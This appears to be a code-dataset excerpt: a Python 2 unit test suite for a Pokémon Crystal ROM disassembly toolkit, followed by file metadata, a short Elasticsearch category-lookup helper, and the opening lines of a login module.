calculate_pointer_from_bytes_at,
isolate_incbins,
process_incbins,
get_labels_between,
generate_diff_insert,
find_labels_without_addresses,
rom_text_at,
get_label_for,
split_incbin_line_into_three,
reset_incbins,
)
# for testing all this crap
try:
import unittest2 as unittest
except ImportError:
import unittest
# check for things we need in unittest
if not hasattr(unittest.TestCase, 'setUpClass'):
sys.stderr.write("The unittest2 module or Python 2.7 is required to run this script.")
sys.exit(1)
class TestCram(unittest.TestCase):
"this is where i cram all of my unit tests together"
@classmethod
def setUpClass(cls):
global rom
cls.rom = direct_load_rom()
rom = cls.rom
@classmethod
def tearDownClass(cls):
del cls.rom
def test_generic_useless(self):
"do i know how to write a test?"
self.assertEqual(1, 1)
def test_map_name_cleaner(self):
name = "hello world"
cleaned_name = map_name_cleaner(name)
self.assertNotEqual(name, cleaned_name)
self.failUnless(" " not in cleaned_name)
name = "Some Random Pokémon Center"
cleaned_name = map_name_cleaner(name)
self.assertNotEqual(name, cleaned_name)
self.failIf(" " in cleaned_name)
self.failIf("é" in cleaned_name)
def test_grouper(self):
data = range(0, 10)
groups = grouper(data, count=2)
self.assertEquals(len(groups), 5)
data = range(0, 20)
groups = grouper(data, count=2)
self.assertEquals(len(groups), 10)
self.assertNotEqual(data, groups)
self.assertNotEqual(len(data), len(groups))
def test_direct_load_rom(self):
rom = self.rom
self.assertEqual(len(rom), 2097152)
self.failUnless(isinstance(rom, RomStr))
def test_load_rom(self):
global rom
rom = None
load_rom()
self.failIf(rom == None)
rom = RomStr(None)
load_rom()
self.failIf(rom == RomStr(None))
def test_load_asm(self):
asm = load_asm()
joined_lines = "\n".join(asm)
self.failUnless("SECTION" in joined_lines)
self.failUnless("bank" in joined_lines)
self.failUnless(isinstance(asm, AsmList))
def test_rom_file_existence(self):
"ROM file must exist"
self.failUnless("baserom.gbc" in os.listdir("../"))
def test_rom_md5(self):
"ROM file must have the correct md5 sum"
rom = self.rom
correct = "9f2922b235a5eeb78d65594e82ef5dde"
md5 = hashlib.md5()
md5.update(rom)
md5sum = md5.hexdigest()
self.assertEqual(md5sum, correct)
def test_bizarre_http_presence(self):
rom_segment = self.rom[0x112116:0x112116+8]
self.assertEqual(rom_segment, "HTTP/1.0")
def test_rom_interval(self):
address = 0x100
interval = 10
correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce',
'0xed', '0x66', '0x66', '0xcc', '0xd']
byte_strings = rom_interval(address, interval, strings=True)
self.assertEqual(byte_strings, correct_strings)
correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13]
ints = rom_interval(address, interval, strings=False)
self.assertEqual(ints, correct_ints)
def test_rom_until(self):
address = 0x1337
byte = 0x13
bytes = rom_until(address, byte, strings=True)
self.failUnless(len(bytes) == 3)
self.failUnless(bytes[0] == '0xd5')
bytes = rom_until(address, byte, strings=False)
self.failUnless(len(bytes) == 3)
self.failUnless(bytes[0] == 0xd5)
def test_how_many_until(self):
how_many = how_many_until(chr(0x13), 0x1337)
self.assertEqual(how_many, 3)
def test_calculate_bank(self):
self.failUnless(calculate_bank(0x8000) == 2)
self.failUnless(calculate_bank("0x9000") == 2)
self.failUnless(calculate_bank(0) == 0)
for address in [0x4000, 0x5000, 0x6000, 0x7000]:
self.assertRaises(Exception, calculate_bank, address)
def test_calculate_pointer(self):
# for offset <= 0x4000
self.assertEqual(calculate_pointer(0x0000), 0x0000)
self.assertEqual(calculate_pointer(0x3FFF), 0x3FFF)
# for 0x4000 <= offset <= 0x7FFFF
self.assertEqual(calculate_pointer(0x430F, bank=5), 0x1430F)
# for offset >= 0x7FFF
self.assertEqual(calculate_pointer(0x8FFF, bank=6), calculate_pointer(0x8FFF, bank=7))
def test_calculate_pointer_from_bytes_at(self):
addr1 = calculate_pointer_from_bytes_at(0x100, bank=False)
self.assertEqual(addr1, 0xc300)
addr2 = calculate_pointer_from_bytes_at(0x100, bank=True)
self.assertEqual(addr2, 0x2ec3)
def test_rom_text_at(self):
self.assertEquals(rom_text_at(0x112116, 8), "HTTP/1.0")
def test_translate_command_byte(self):
self.failUnless(translate_command_byte(crystal=0x0) == 0x0)
self.failUnless(translate_command_byte(crystal=0x10) == 0x10)
self.failUnless(translate_command_byte(crystal=0x40) == 0x40)
self.failUnless(translate_command_byte(gold=0x0) == 0x0)
self.failUnless(translate_command_byte(gold=0x10) == 0x10)
self.failUnless(translate_command_byte(gold=0x40) == 0x40)
self.assertEqual(translate_command_byte(gold=0x0), translate_command_byte(crystal=0x0))
self.failUnless(translate_command_byte(gold=0x52) == 0x53)
self.failUnless(translate_command_byte(gold=0x53) == 0x54)
self.failUnless(translate_command_byte(crystal=0x53) == 0x52)
self.failUnless(translate_command_byte(crystal=0x52) == None)
self.assertRaises(Exception, translate_command_byte, None, gold=0xA4)
def test_pksv_integrity(self):
"does pksv_gs look okay?"
self.assertEqual(pksv_gs[0x00], "2call")
self.assertEqual(pksv_gs[0x2D], "givepoke")
self.assertEqual(pksv_gs[0x85], "waitbutton")
self.assertEqual(pksv_crystal[0x00], "2call")
self.assertEqual(pksv_crystal[0x86], "waitbutton")
self.assertEqual(pksv_crystal[0xA2], "credits")
def test_chars_integrity(self):
self.assertEqual(chars[0x80], "A")
self.assertEqual(chars[0xA0], "a")
self.assertEqual(chars[0xF0], "¥")
self.assertEqual(jap_chars[0x44], "ぱ")
def test_map_names_integrity(self):
def map_name(map_group, map_id): return map_names[map_group][map_id]["name"]
self.assertEqual(map_name(2, 7), "Mahogany Town")
self.assertEqual(map_name(3, 0x34), "Ilex Forest")
self.assertEqual(map_name(7, 0x11), "Cerulean City")
def test_load_map_group_offsets(self):
addresses = load_map_group_offsets()
self.assertEqual(len(addresses), 26, msg="there should be 26 map groups")
addresses = load_map_group_offsets()
self.assertEqual(len(addresses), 26, msg="there should still be 26 map groups")
self.assertIn(0x94034, addresses)
for address in addresses:
self.assertGreaterEqual(address, 0x4000)
self.failIf(0x4000 <= address <= 0x7FFF)
self.failIf(address <= 0x4000)
def test_index(self):
self.assertTrue(index([1,2,3,4], lambda f: True) == 0)
self.assertTrue(index([1,2,3,4], lambda f: f==3) == 2)
def test_get_pokemon_constant_by_id(self):
x = get_pokemon_constant_by_id
self.assertEqual(x(1), "BULBASAUR")
self.assertEqual(x(151), "MEW")
self.assertEqual(x(250), "HO_OH")
def test_find_item_label_by_id(self):
x = find_item_label_by_id
self.assertEqual(x(249), "HM_07")
self.assertEqual(x(173), "BERRY")
self.assertEqual(x(45), None)
def test_generate_item_constants(self):
x = generate_item_constants
r = x()
self.failUnless("HM_07" in r)
self.failUnless("EQU" in r)
def test_get_label_for(self):
global all_labels
temp = copy(all_labels)
# this is basd on the format defined in get_labels_between
all_labels = [{"label": "poop", "address": 0x5,
"offset": 0x5, "bank": 0,
"line_number": 2
}]
self.assertEqual(get_label_for(5), "poop")
all_labels = temp
def test_generate_map_constant_labels(self):
ids = generate_map_constant_labels()
self.assertEqual(ids[0]["label"], "OLIVINE_POKECENTER_1F")
self.assertEqual(ids[1]["label"], "OLIVINE_GYM")
def test_get_id_for_map_constant_label(self):
global map_internal_ids
map_internal_ids = generate_map_constant_labels()
self.assertEqual(get_id_for_map_constant_label("OLIVINE_GYM"), 1)
self.assertEqual(get_id_for_map_constant_label("OLIVINE_POKECENTER_1F"), 0)
def test_get_map_constant_label_by_id(self):
global map_internal_ids
map_internal_ids = generate_map_constant_labels()
self.assertEqual(get_map_constant_label_by_id(0), "OLIVINE_POKECENTER_1F")
self.assertEqual(get_map_constant_label_by_id(1), "OLIVINE_GYM")
def test_is_valid_address(self):
self.assertTrue(is_valid_address(0))
self.assertTrue(is_valid_address(1))
self.assertTrue(is_valid_address(10))
self.assertTrue(is_valid_address(100))
self.assertTrue(is_valid_address(1000))
self.assertTrue(is_valid_address(10000))
self.assertFalse(is_valid_address(2097153))
self.assertFalse(is_valid_address(2098000))
addresses = [random.randrange(0,2097153) for i in range(0, 9+1)]
for address in addresses:
self.assertTrue(is_valid_address(address))
class TestIntervalMap(unittest.TestCase):
def test_intervals(self):
i = IntervalMap()
first = "hello world"
second = "testing 123"
i[0:5] = first
i[5:10] = second
self.assertEqual(i[0], first)
self.assertEqual(i[1], first)
self.assertNotEqual(i[5], first)
self.assertEqual(i[6], second)
i[3:10] = second
self.assertEqual(i[3], second)
self.assertNotEqual(i[4], first)
def test_items(self):
i = IntervalMap()
first = "hello world"
second = "testing 123"
i[0:5] = first
i[5:10] = second
results = list(i.items())
self.failUnless(len(results) == 2)
self.assertEqual(results[0], ((0, 5), "hello world"))
self.assertEqual(results[1], ((5, 10), "testing 123"))
class TestRomStr(unittest.TestCase):
"""RomStr is a class that should act exactly like str()
except that it never shows the contents of it string
unless explicitly forced"""
sample_text = "hello world!"
sample = None
def setUp(self):
if self.sample == None:
self.__class__.sample = RomStr(self.sample_text)
def test_equals(self):
"check if RomStr() == str()"
self.assertEquals(self.sample_text, self.sample)
def test_not_equal(self):
"check if RomStr('a') != RomStr('b')"
self.assertNotEqual(RomStr('a'), RomStr('b'))
def test_appending(self):
"check if RomStr()+'a'==str()+'a'"
self.assertEquals(self.sample_text+'a', self.sample+'a')
def test_conversion(self):
"check if RomStr() -> str() works"
self.assertEquals(str(self.sample), self.sample_text)
def test_inheritance(self):
self.failUnless(issubclass(RomStr, str))
def test_length(self):
self.assertEquals(len(self.sample_text), len(self.sample))
self.assertEquals(len(self.sample_text), self.sample.length())
self.assertEquals(len(self.sample), self.sample.length())
def test_rom_interval(self):
global rom
load_rom()
address = 0x100
interval = 10
correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce',
'0xed', '0x66', '0x66', '0xcc', '0xd']
byte_strings = rom.interval(address, interval, strings=True)
self.assertEqual(byte_strings, correct_strings)
correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13]
ints = rom.interval(address, interval, strings=False)
self.assertEqual(ints, correct_ints)
def test_rom_until(self):
global rom
load_rom()
address = 0x1337
byte = 0x13
bytes = rom.until(address, byte, strings=True)
self.failUnless(len(bytes) == 3)
self.failUnless(bytes[0] == '0xd5')
bytes = rom.until(address, byte, strings=False)
self.failUnless(len(bytes) == 3)
self.failUnless(bytes[0] == 0xd5)
class TestAsmList(unittest.TestCase):
"""AsmList is a class that should act exactly like list()
except that it never shows the contents of its list
unless explicitly forced"""
def test_equals(self):
base = [1,2,3]
asm = AsmList(base)
self.assertEquals(base, asm)
self.assertEquals(asm, base)
self.assertEquals(base, list(asm))
def test_inheritance(self):
self.failUnless(issubclass(AsmList, list))
def test_length(self):
base = range(0, 10)
asm = AsmList(base)
self.assertEquals(len(base), len(asm))
self.assertEquals(len(base), asm.length())
self.assertEquals(len(base), len(list(asm)))
self.assertEquals(len(asm), asm.length())
def test_remove_quoted_text(self):
x = remove_quoted_text
self.assertEqual(x("hello world"), "hello world")
self.assertEqual(x("hello \"world\""), "hello ")
input = 'hello world "testing 123"'
self.assertNotEqual(x(input), input)
input = "hello world 'testing 123'"
self.assertNotEqual(x(input), input)
self.failIf("testing" in x(input))
def test_line_has_comment_address(self):
x = line_has_comment_address
self.assertFalse(x(""))
self.assertFalse(x(";"))
self.assertFalse(x(";;;"))
self.assertFalse(x(":;"))
self.assertFalse(x(":;:"))
self.assertFalse(x(";:"))
self.assertFalse(x(" "))
self.assertFalse(x("".join(" " * 5)))
self.assertFalse(x("".join(" " * 10)))
self.assertFalse(x("hello world"))
self.assertFalse(x("hello_world"))
self.assertFalse(x("hello_world:"))
self.assertFalse(x("hello_world:;"))
self.assertFalse(x("hello_world: ;"))
self.assertFalse(x("hello_world: ; "))
self.assertFalse(x("hello_world: ;" + "".join(" " * 5)))
self.assertFalse(x("hello_world: ;" + "".join(" " * 10)))
self.assertTrue(x(";1"))
self.assertTrue(x(";F"))
self.assertTrue(x(";$00FF"))
self.assertTrue(x(";0x00FF"))
self.assertTrue(x("; 0x00FF"))
self.assertTrue(x(";$3:$300"))
self.assertTrue(x(";0x3:$300"))
self.assertTrue(x(";$3:0x300"))
self.assertTrue(x(";3:300"))
self.assertTrue(x(";3:FFAA"))
self.assertFalse(x('hello world "how are you today;0x1"'))
self.assertTrue(x('hello world "how are you today:0x1";1'))
returnable = {}
self.assertTrue(x("hello_world: ; 0x4050", returnable=returnable, bank=5))
self.assertTrue(returnable["address"] == 0x14050)
def test_line_has_label(self):
x = line_has_label
self.assertTrue(x("hi:"))
self.assertTrue(x("Hello: "))
self.assertTrue(x("MyLabel: ; test xyz"))
self.assertFalse(x(":"))
self.assertFalse(x(";HelloWorld:"))
self.assertFalse(x("::::"))
self.assertFalse(x(":;:;:;:::"))
def test_get_label_from_line(self):
x = get_label_from_line
self.assertEqual(x("HelloWorld: "), "HelloWorld")
self.assertEqual(x("HiWorld:"), "HiWorld")
self.assertEqual(x("HiWorld"), None)
def test_find_labels_without_addresses(self):
global asm
asm = ["hello_world: ; 0x1", "hello_world2: ;"]
labels = find_labels_without_addresses()
self.failUnless(labels[0]["label"] == "hello_world2")
asm = ["hello world: ;1", "hello_world: ;2"]
labels = find_labels_without_addresses()
self.failUnless(len(labels) == 0)
asm = None
def test_get_labels_between(self):
global asm
x = get_labels_between#(start_line_id, end_line_id, bank)
asm = ["HelloWorld: ;1",
"hi:",
"no label on this line",
]
labels = x(0, 2, 0x12)
self.assertEqual(len(labels), 1)
self.assertEqual(labels[0]["label"], "HelloWorld")
del asm
# this test takes a lot of time :(
def xtest_scan_for_predefined_labels(self):
# label keys: line_number, bank, label, offset, address
load_asm()
all_labels = scan_for_predefined_labels()
label_names = [x["label"] for x in all_labels]
self.assertIn("GetFarByte", label_names)
self.assertIn("AddNTimes", label_names)
self.assertIn("CheckShininess", label_names)
def test_write_all_labels(self):
"""dumping json into a file"""
filename = "test_labels.json"
# remove the current file
if os.path.exists(filename):
os.system("rm " + filename)
# make up some labels
labels = []
# fake label 1
label = {"line_number": 5, "bank": 0, "label": "SomeLabel", "address": 0x10}
labels.append(label)
# fake label 2
label = {"line_number": 15, "bank": 2, "label": "SomeOtherLabel", "address": 0x9F0A}
labels.append(label)
# dump to file
write_all_labels(labels, filename=filename)
# open the file and read the contents
file_handler = open(filename, "r")
contents = file_handler.read()
file_handler.close()
# parse into json
obj = json.read(contents)
# begin testing
self.assertEqual(len(obj), len(labels))
self.assertEqual(len(obj), 2)
self.assertEqual(obj, labels)
def test_isolate_incbins(self):
global asm
asm = ["123", "456", "789", "abc", "def", "ghi",
'INCBIN "baserom.gbc",$12DA,$12F8 - $12DA',
"jkl",
'INCBIN "baserom.gbc",$137A,$13D0 - $137A']
lines = isolate_incbins()
self.assertIn(asm[6], lines)
self.assertIn(asm[8], lines)
for line in lines:
self.assertIn("baserom", line)
def test_process_incbins(self):
global incbin_lines, processed_incbins, asm
incbin_lines = ['INCBIN "baserom.gbc",$12DA,$12F8 - $12DA',
'INCBIN "baserom.gbc",$137A,$13D0 - $137A']
asm = copy(incbin_lines)
asm.insert(1, "some other random line")
processed_incbins = process_incbins()
self.assertEqual(len(processed_incbins), len(incbin_lines))
self.assertEqual(processed_incbins[0]["line"], incbin_lines[0])
self.assertEqual(processed_incbins[2]["line"], incbin_lines[1])
def test_reset_incbins(self):
global asm, incbin_lines, processed_incbins
# temporarily override the functions
global load_asm, isolate_incbins, process_incbins
temp1, temp2, temp3 = load_asm, isolate_incbins, process_incbins
def load_asm(): pass
def isolate_incbins(): pass
def process_incbins(): pass
# call reset
reset_incbins()
# check the results
self.assertTrue(asm == [] or asm == None)
self.assertTrue(incbin_lines == [])
self.assertTrue(processed_incbins == {})
# reset the original functions
load_asm, isolate_incbins, process_incbins = temp1, temp2, temp3
def test_find_incbin_to_replace_for(self):
global asm, incbin_lines, processed_incbins
asm = ['first line', 'second line', 'third line',
'INCBIN "baserom.gbc",$90,$200 - $90',
'fifth line', 'last line']
isolate_incbins()
process_incbins()
line_num = find_incbin_to_replace_for(0x100)
# must be the 4th line (the INBIN line)
self.assertEqual(line_num, 3)
def test_split_incbin_line_into_three(self):
global asm, incbin_lines, processed_incbins
asm = ['first line', 'second line', 'third line',
'INCBIN "baserom.gbc",$90,$200 - $90',
'fifth line', 'last line']
isolate_incbins()
process_incbins()
content = split_incbin_line_into_three(3, 0x100, 10)
# must end up with three INCBINs in output
self.failUnless(content.count("INCBIN") == 3)
def test_analyze_intervals(self):
global asm, incbin_lines, processed_incbins
asm, incbin_lines, processed_incbins = None, [], {}
asm = ['first line', 'second line', 'third line',
'INCBIN "baserom.gbc",$90,$200 - $90',
'fifth line', 'last line',
'INCBIN "baserom.gbc",$33F,$4000 - $33F']
isolate_incbins()
process_incbins()
largest = analyze_intervals()
self.assertEqual(largest[0]["line_number"], 6)
self.assertEqual(largest[0]["line"], asm[6])
self.assertEqual(largest[1]["line_number"], 3)
self.assertEqual(largest[1]["line"], asm[3])
def test_generate_diff_insert(self):
global asm
asm = ['first line', 'second line', 'third line',
'INCBIN "baserom.gbc",$90,$200 - $90',
'fifth line', 'last line',
'INCBIN "baserom.gbc",$33F,$4000 - $33F']
diff = generate_diff_insert(0, "the real first line", debug=False)
self.assertIn("the real first line", diff)
self.assertIn("INCBIN", diff)
self.assertNotIn("No newline at end of file", diff)
self.assertIn("+"+asm[1], diff)
class TestMapParsing(unittest.TestCase):
def test_parse_all_map_headers(self):
global parse_map_header_at, old_parse_map_header_at, counter
counter = 0
for k in map_names.keys():
if "offset" not in map_names[k].keys():
map_names[k]["offset"] = 0
temp = parse_map_header_at
temp2 = old_parse_map_header_at
def parse_map_header_at(address, map_group=None, map_id=None, debug=False):
global counter
counter += 1
return {}
old_parse_map_header_at = parse_map_header_at
parse_all_map_headers(debug=False)
# parse_all_map_headers is currently doing it 2x
# because of the new/old map header parsing routines
self.assertEqual(counter, 388 * 2)
parse_map_header_at = temp
old_parse_map_header_at = temp2
class TestTextScript(unittest.TestCase):
"""for testing 'in-script' commands, etc."""
#def test_to_asm(self):
# pass # or raise NotImplementedError, bryan_message
#def test_find_addresses(self):
# pass # or raise NotImplementedError, bryan_message
#def test_parse_text_at(self):
# pass # or raise NotImplementedError, bryan_message
class TestEncodedText(unittest.TestCase):
"""for testing chars-table encoded text chunks"""
def test_process_00_subcommands(self):
g = process_00_subcommands(0x197186, 0x197186+601, debug=False)
self.assertEqual(len(g), 42)
self.assertEqual(len(g[0]), 13)
self.assertEqual(g[1], [184, 174, 180, 211, 164, 127, 20, 231, 81])
def test_parse_text_at2(self):
oakspeech = parse_text_at2(0x197186, 601, debug=False)
self.assertIn("encyclopedia", oakspeech)
self.assertIn("researcher", oakspeech)
self.assertIn("dependable", oakspeech)
def test_parse_text_engine_script_at(self):
p = parse_text_engine_script_at(0x197185, debug=False)
self.assertEqual(len(p.commands), 2)
self.assertEqual(len(p.commands[0]["lines"]), 41)
# don't really care about these other two
def test_parse_text_from_bytes(self): pass
def test_parse_text_at(self): pass
class TestScript(unittest.TestCase):
"""for testing parse_script_engine_script_at and script parsing in
general. Script should be a class."""
#def test_parse_script_engine_script_at(self):
# pass # or raise NotImplementedError, bryan_message
def test_find_all_text_pointers_in_script_engine_script(self):
address = 0x197637 # 0x197634
script = parse_script_engine_script_at(address, debug=False)
bank = calculate_bank(address)
r = find_all_text_pointers_in_script_engine_script(script, bank=bank, debug=False)
results = list(r)
self.assertIn(0x197661, results)
class TestLabel(unittest.TestCase):
def test_label_making(self):
line_number = 2
address = 0xf0c0
label_name = "poop"
l = Label(name=label_name, address=address, line_number=line_number)
self.failUnless(hasattr(l, "name"))
self.failUnless(hasattr(l, "address"))
self.failUnless(hasattr(l, "line_number"))
self.failIf(isinstance(l.address, str))
self.failIf(isinstance(l.line_number, str))
self.failUnless(isinstance(l.name, str))
self.assertEqual(l.line_number, line_number)
self.assertEqual(l.name, label_name)
self.assertEqual(l.address, address)
class TestByteParams(unittest.TestCase):
@classmethod
def setUpClass(cls):
load_rom()
cls.address = 10
cls.sbp = SingleByteParam(address=cls.address)
@classmethod
def tearDownClass(cls):
del cls.sbp
def test__init__(self):
self.assertEqual(self.sbp.size, 1)
self.assertEqual(self.sbp.address, self.address)
def test_parse(self):
self.sbp.parse()
self.assertEqual(str(self.sbp.byte), str(45))
def test_to_asm(self):
self.assertEqual(self.sbp.to_asm(), "$2d")
self.sbp.should_be_decimal = True
self.assertEqual(self.sbp.to_asm(), str(45))
# HexByte and DollarSignByte are the same now
def test_HexByte_to_asm(self):
h = HexByte(address=10)
a = h.to_asm()
self.assertEqual(a, "$2d")
def test_DollarSignByte_to_asm(self):
d = DollarSignByte(address=10)
a = d.to_asm()
self.assertEqual(a, "$2d")
def test_ItemLabelByte_to_asm(self):
i = ItemLabelByte(address=433)
self.assertEqual(i.byte, 54)
self.assertEqual(i.to_asm(), "COIN_CASE")
self.assertEqual(ItemLabelByte(address=10).to_asm(), "$2d")
def test_DecimalParam_to_asm(self):
d = DecimalParam(address=10)
x = d.to_asm()
self.assertEqual(x, str(0x2d))
class TestMultiByteParam(unittest.TestCase):
def setup_for(self, somecls, byte_size=2, address=443, **kwargs):
self.cls = somecls(address=address, size=byte_size, **kwargs)
self.assertEqual(self.cls.address, address)
self.assertEqual(self.cls.bytes, rom_interval(address, byte_size, strings=False))
self.assertEqual(self.cls.size, byte_size)
def test_two_byte_param(self):
self.setup_for(MultiByteParam, byte_size=2)
self.assertEqual(self.cls.to_asm(), "$f0c0")
def test_three_byte_param(self):
self.setup_for(MultiByteParam, byte_size=3)
def test_PointerLabelParam_no_bank(self):
self.setup_for(PointerLabelParam, bank=None)
# assuming no label at this location..
self.assertEqual(self.cls.to_asm(), "$f0c0")
global all_labels
# hm.. maybe all_labels should be using a class?
all_labels = [{"label": "poop", "address": 0xf0c0,
"offset": 0xf0c0, "bank": 0,
"line_number": 2
}]
self.assertEqual(self.cls.to_asm(), "poop")
class TestPostParsing: #(unittest.TestCase):
"""tests that must be run after parsing all maps"""
@classmethod
def setUpClass(cls):
run_main()
def test_signpost_counts(self):
self.assertEqual(len(map_names[1][1]["signposts"]), 0)
self.assertEqual(len(map_names[1][2]["signposts"]), 2)
self.assertEqual(len(map_names[10][5]["signposts"]), 7)
def test_warp_counts(self):
self.assertEqual(map_names[10][5]["warp_count"], 9)
self.assertEqual(map_names[18][5]["warp_count"], 3)
self.assertEqual(map_names[15][1]["warp_count"], 2)
def test_map_sizes(self):
self.assertEqual(map_names[15][1]["height"], 18)
self.assertEqual(map_names[15][1]["width"], 10)
self.assertEqual(map_names[7][1]["height"], 4)
self.assertEqual(map_names[7][1]["width"], 4)
def test_map_connection_counts(self):
self.assertEqual(map_names[7][1]["connections"], 0)
self.assertEqual(map_names[10][1]["connections"], 12)
self.assertEqual(map_names[10][2]["connections"], 12)
self.assertEqual(map_names[11][1]["connections"], 9) # or 13?
def test_second_map_header_address(self):
self.assertEqual(map_names[11][1]["second_map_header_address"], 0x9509c)
self.assertEqual(map_names[1][5]["second_map_header_address"], 0x95bd0)
def test_event_address(self):
self.assertEqual(map_names[17][5]["event_address"], 0x194d67)
self.assertEqual(map_names[23][3]["event_address"], 0x1a9ec9)
def test_people_event_counts(self):
self.assertEqual(len(map_names[23][3]["people_events"]), 4)
self.assertEqual(len(map_names[10][3]["people_events"]), 9)
class TestMetaTesting(unittest.TestCase):
"""test whether or not i am finding at least
some of the tests in this file"""
tests = None
def setUp(self):
if self.tests == None:
self.__class__.tests = assemble_test_cases()
def test_assemble_test_cases_count(self):
"does assemble_test_cases find some tests?"
self.failUnless(len(self.tests) > 0)
def test_assemble_test_cases_inclusion(self):
"is this class found by assemble_test_cases?"
# i guess it would have to be for this to be running?
self.failUnless(self.__class__ in self.tests)
def test_assemble_test_cases_others(self):
"test other inclusions for assemble_test_cases"
self.failUnless(TestRomStr in self.tests)
self.failUnless(TestCram in self.tests)
def test_check_has_test(self):
self.failUnless(check_has_test("beaver", ["test_beaver"]))
self.failUnless(check_has_test("beaver", ["test_beaver_2"]))
self.failIf(check_has_test("beaver_1", ["test_beaver"]))
def test_find_untested_methods(self):
untested = find_untested_methods()
# the return type must be an iterable
self.failUnless(hasattr(untested, "__iter__"))
#.. basically, a list
self.failUnless(isinstance(untested, list))
def test_find_untested_methods_method(self):
"""create a function and see if it is found"""
# setup a function in the global namespace
global some_random_test_method
# define the method
def some_random_test_method(): pass
# first make sure it is in the global scope
members = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
func_names = [functuple[0] for functuple in members]
self.assertIn("some_random_test_method", func_names)
# test whether or not it is found by find_untested_methods
untested = find_untested_methods()
self.assertIn("some_random_test_method", untested)
# remove the test method from the global namespace
del some_random_test_method
def test_load_tests(self):
loader = unittest.TestLoader()
suite = load_tests(loader, None, None)
suite._tests[0]._testMethodName
membership_test = lambda member: \
inspect.isclass(member) and issubclass(member, unittest.TestCase)
tests = inspect.getmembers(sys.modules[__name__], membership_test)
classes = [x[1] for x in tests]
for test in suite._tests:
self.assertIn(test.__class__, classes)
def test_report_untested(self):
untested = find_untested_methods()
output = report_untested()
if len(untested) > 0:
self.assertIn("NOT TESTED", output)
for name in untested:
self.assertIn(name, output)
elif len(untested) == 0:
self.assertNotIn("NOT TESTED", output)
def assemble_test_cases():
"""finds classes that inherit from unittest.TestCase
because i am too lazy to remember to add them to a
global list of tests for the suite runner"""
classes = []
clsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)
for (name, some_class) in clsmembers:
if issubclass(some_class, unittest.TestCase):
classes.append(some_class)
return classes
def load_tests(loader, tests, pattern):
suite = unittest.TestSuite()
for test_class in assemble_test_cases():
tests = loader.loadTestsFromTestCase(test_class)
suite.addTests(tests)
return suite
def check_has_test(func_name, tested_names):
"""checks if there is a test dedicated to this function"""
if "test_"+func_name in tested_names:
return True
for name in tested_names:
if "test_"+func_name in name:
return True
return False
def find_untested_methods():
"""finds all untested functions in this module
by searching for method names in test case
method names."""
untested = []
avoid_funcs = ["main", "run_tests", "run_main", "copy", "deepcopy"]
test_funcs = []
# get a list of all classes in this module
classes = inspect.getmembers(sys.modules[__name__], inspect.isclass)
# for each class..
for (name, klass) in classes:
# only look at those that have tests
if issubclass(klass, unittest.TestCase):
# look at this class' methods
funcs = inspect.getmembers(klass, inspect.ismethod)
# for each method..
for (name2, func) in funcs:
# store the ones that begin with test_
if "test_" in name2 and name2[0:5] == "test_":
test_funcs.append([name2, func])
# assemble a list of all test method names (test_x, test_y, ..)
tested_names = [funcz[0] for funcz in test_funcs]
# now get a list of all functions in this module
funcs = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
# for each function..
for (name, func) in funcs:
# we don't care about some of these
if name in avoid_funcs: continue
# skip functions beginning with _
if name[0] == "_": continue
# check if this function has a test named after it
has_test = check_has_test(name, tested_names)
if not has_test:
untested.append(name)
return untested
def report_untested():
"""
This reports about untested functions in the global namespace. This was
originally in the crystal module, where it would list out the majority of
the functions. Maybe it should be moved back.
"""
untested = find_untested_methods()
output = "NOT TESTED: ["
first = True
for name in untested:
if first:
output += name
first = False
else: output += ", "+name
output += "]\n"
output += "total untested: " + str(len(untested))
return output
def run_tests(): # rather than unittest.main()
loader = unittest.TestLoader()
suite = load_tests(loader, None, None)
unittest.TextTestRunner(verbosity=2).run(suite)
print report_untested()
# run the unit tests when this file is executed directly
if __name__ == "__main__":
run_tests()
| UTF-8 | Python | false | false | 37,500 | py | 147 | tests.py | 8 | 0.613095 | 0.585065 | 0 | 1,014 | 35.976331 | 95 |
naveenpras/listapi | 16,363,825,397,813 | 5e6b9fcacf6e5eb10a881358691f786ecefa8c95 | a8b3877bec390809d446e66ce130e1907b3998f5 | /apiservice/utils.py | a6c22e1532d2ca3a045cae1da97ad7990276d53e | [] | no_license | https://github.com/naveenpras/listapi | d42dbcfb459bbabe7e23e2dfd1ea8c9b76c9f31e | d4c439468e7c3329baf6879040a9fb34824bc7f3 | refs/heads/master | 2015-08-11T23:55:16.517765 | 2015-06-24T05:56:09 | 2015-06-24T05:56:09 | 20,580,908 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from elasticutils import S
import logging
logger = logging.getLogger(__name__)
class Utils():
def searchItemAndGetCategory(self,item):
logger.debug("Finding Category for:" + item)
#searchstring = item.lower()
searchstring = item
logger.debug("Getting category using match for:" + searchstring)
categoryid = "0"
q = S().query(item__match=searchstring)
if q.count() > 0:
result = list(q[:1])[0]
categoryid = result.CategoryId
logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId))
return int(categoryid)
else:
logger.debug("Getting category using fuzzy for:" + searchstring)
q = S().query(item__fuzzy=searchstring)
if q.count() > 0:
result = list(q[:1])[0]
categoryid = result.CategoryId
logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId))
return int(categoryid)
else:
logger.debug("Getting category using wildcard for:" + searchstring)
q = S().query(item__wildcard="*" + searchstring + "*")
if q.count() > 0:
result = list(q[:1])[0]
categoryid = result.CategoryId
logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId))
return int(categoryid)
else:
logger.info("\tCategory not found for item:" + item)
return int(categoryid) | UTF-8 | Python | false | false | 1,608 | py | 28 | utils.py | 17 | 0.536692 | 0.530473 | 0 | 37 | 42.486486 | 97 |
ssurkovs/planerka | 15,479,062,143,907 | f48b644b8025c6ab106dcc3c6eea0c3158924d77 | 56429de82e9539f6165d3ead31b0762e7bd7dd12 | /views/login.py | 681c7c2f21714af0cf26a679b8fea36a16c6429f | [] | no_license | https://github.com/ssurkovs/planerka | 9f2ce82ac3e772764b2bd6b600d83930db516a78 | 8d9abe46b62ba96687e0dddcd9b517504d210970 | refs/heads/master | 2018-10-28T20:09:29.117364 | 2018-10-25T16:08:05 | 2018-10-25T16:08:05 | 112,482,528 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from hashlib import md5
